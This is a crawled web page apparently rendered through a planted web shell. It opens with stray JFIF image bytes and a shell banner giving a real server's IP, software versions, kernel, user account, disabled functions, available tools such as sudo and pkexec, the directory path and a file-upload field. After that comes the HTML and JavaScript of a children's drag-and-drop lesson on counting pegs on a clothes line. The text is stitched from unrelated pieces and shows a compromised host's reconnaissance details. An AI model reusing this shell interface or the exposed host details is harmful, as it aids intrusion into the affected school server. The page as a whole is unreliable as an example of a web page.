????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.141.33.133 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old4/Html/LevelA/Category2/ |
Upload File : |
<!doctype html> <html> <head> <title>Count the pegs on the cloth line and match</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <script> function page_preLoad() { shared_setDeviceTypeLevelCategoryLastLesson(Level.A, Category.No2); shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.A, Category.No2, 12), true, true); shared_setFooterTable('id_tblFooter', true, true, false, true, true); var ids_boxes = ['id_BoxForPeg1', 'id_BoxForPeg2', 'id_BoxForPeg3', 'id_BoxForPeg4']; var ids_headings = ['id_td_heading1']; var ids_All = ids_headings.concat(ids_boxes); shared_adjust_fontSize_for_ids_all_devices(ids_All, 80); shared_init_dropBox_tds_with_drag_here(ids_boxes); var id_tables_array = ['id_table1']; shared_border_collapse_for_tables_except_android(id_tables_array); } function page_onLoad() { } function btnPrevious_click() { window.location = "LevelACat2Lesson11.html"; } function btnNext_click() { window.location = "LevelACat2Lesson13.html"; } function btnHome_click() { shared_btnHomeCategories_click('LevelA'); } function DragDrop(id_dropBox, id_imgElement, ids_array) { if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array)) { shared_dragDropImageAndIsMovedTrue(shared_currentDropingId, id_dropBox, id_imgElement); isAllInfosMovedShowClapsAnimation(); shared_set_currentDropingId_draggbleToFalse(); } else { shared_resetCurrentDroppingPosition(id_dropBox); } } function isAllInfosMovedShowClapsAnimation() { var ids_boxes = ['id_BoxForPeg1', 'id_BoxForPeg2', 'id_BoxForPeg3', 'id_BoxForPeg4']; shared_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes); } </script> </head> <body onload="page_onLoad()"> <div id="shared_id_div_claps_image"> </div> <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0"> <tr height="8%"> <td> <div id="id_tblHeader"></div> </td> </tr> <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="5%"> <td> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="2%" style="border-left: none; border-right: none; border-top: none; border-collapse: collapse"> <tr> <td id="id_td_heading1" width="100%" class="shared_style_black_24px_bold" style="padding-left:2%; border: none"><u>Count the <span style="color: red"><u>peg</u></span>s on the cloth line and match</u> </td> </tr> </table> </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" id="id_WithMansVansTable" border="0" cellspacing="0" cellpadding="2%"> <tr height="20%"> <td style="padding-bottom: 0px"> <table id="id_table1" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td_Peg1" class="id_tdPeg" width="25%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_Peg1"> <img id="id_imgPeg1" src="../../../img/LevelA/Category2/LevelACat2Lesson12/Peg1.png" width="70%" height="auto"> </span> </td> <td id="id_td_Peg2" class="id_tdPeg" width="25%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_Peg2"> <img id="id_imgPeg2" src="../../../img/LevelA/Category2/LevelACat2Lesson12/Peg2.png" width="70%" height="auto"> </span> </td> <td id="id_td_Peg4" class="id_tdPeg" width="25%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_Peg4"> <img id="id_imgPeg4" src="../../../img/LevelA/Category2/LevelACat2Lesson12/Peg4.png" width="70%" height="auto"> </span> </td> <td id="id_td_Peg3" class="id_tdPeg" width="25%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_span_Peg3"> <img id="id_imgPeg3" src="../../../img/LevelA/Category2/LevelACat2Lesson12/Peg3.png" width="70%" height="auto"> </span> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="2%" style="border-collapse: collapse"> <tr id="id_tr_Peg4" height="25%" ondragover="shared_highlight('id_BoxForPeg4'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_BoxForPeg4')" ondrop="DragDrop('id_BoxForPeg4', 'id_imgPeg4', ['id_span_Peg4'])"> <td class="cls_tdCloths" width="50%" align="center"> <img id="id_imgCloth" src="../../../img/LevelA/Category2/LevelACat2Lesson12/Coloth.png" width="40%" height="auto"> </td> <td width="50%" id="id_BoxForPeg4" class="cls_BoxForPeg4 shared_style_red_24px_bold" style="text-align:center; border-left: none"> </td> </tr> <tr id="id_tr_Peg1" height="25%" ondragover="shared_highlight('id_BoxForPeg1'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_BoxForPeg1')" ondrop="DragDrop('id_BoxForPeg1', 'id_imgPeg1', ['id_span_Peg1'])"> <td class="cls_tdCloths" width="50%" width="50%" align="center" style="border-top:none"> <img id="id_imgSox" src="../../../img/LevelA/Category2/LevelACat2Lesson12/Sox.png" width="40%" height="auto"> </td> <td width="50%" id="id_BoxForPeg1" class="cls_BoxForPeg1 shared_style_red_24px_bold" style="text-align:center;border-top:none; border-bottom: none; border-left: none"> </td> </tr> <tr id="id_tr_Peg3" height="25%" ondragover="shared_highlight('id_BoxForPeg3'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_BoxForPeg3')" ondrop="DragDrop('id_BoxForPeg3', 'id_imgPeg3', ['id_span_Peg3'])"> <td width="50%" align="center" style="border-bottom:none; border-top:none"> <img id="id_imgSoxes" src="../../../img/LevelA/Category2/LevelACat2Lesson12/Soxes.png" width="40%" height="auto"> </td> <td width="50%" id="id_BoxForPeg3" class="cls_BoxForPeg3 shared_style_red_24px_bold" style="text-align:center; border-left: none; border-bottom:none"> </td> </tr> <tr id="id_tr_Peg2" height="*" ondragover="shared_highlight('id_BoxForPeg2'); shared_allowDrop_web(event)" ondragleave="shared_un_highlight('id_BoxForPeg2')" ondrop="DragDrop('id_BoxForPeg2', 'id_imgPeg2', ['id_span_Peg2'])"> <td width="50%" style="text-align:center"> <img id="id_imgUnderWare" src="../../../img/LevelA/Category2/LevelACat2Lesson12/UnderWare.png" width="40%" height="auto"> </td> <td width="50%" id="id_BoxForPeg2" class="cls_BoxForPeg2 shared_style_red_24px_bold" style="text-align:center; border-left: none"> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="8%"> <td> <div id="id_tblFooter"></div> </td> </tr> </table> <script> page_preLoad(); new webkit_draggable('id_span_Peg1', {handle : 'id_td_Peg1', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_Peg2', {handle : 'id_td_Peg2', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_Peg3', {handle : 'id_td_Peg3', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_span_Peg4', {handle : 'id_td_Peg4', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); webkit_drop.add('id_tr_Peg1', {onOver : function(){shared_highlight('id_BoxForPeg1')}, onOut : function(){shared_un_highlight('id_BoxForPeg1')}, onDrop : function(){DragDrop('id_BoxForPeg1', 'id_imgPeg1', ['id_span_Peg1'])}}); webkit_drop.add('id_tr_Peg2', {onOver : function(){shared_highlight('id_BoxForPeg2')}, onOut : function(){shared_un_highlight('id_BoxForPeg2')}, onDrop : function(){DragDrop('id_BoxForPeg2', 'id_imgPeg2', ['id_span_Peg2'])}}); webkit_drop.add('id_tr_Peg3', {onOver : function(){shared_highlight('id_BoxForPeg3')}, onOut : function(){shared_un_highlight('id_BoxForPeg3')}, onDrop : function(){DragDrop('id_BoxForPeg3', 'id_imgPeg3', ['id_span_Peg3'])}}); webkit_drop.add('id_tr_Peg4', {onOver : function(){shared_highlight('id_BoxForPeg4')}, onOut : function(){shared_un_highlight('id_BoxForPeg4')}, onDrop : function(){DragDrop('id_BoxForPeg4', 'id_imgPeg4', ['id_span_Peg4'])}}); </script> </body> </html>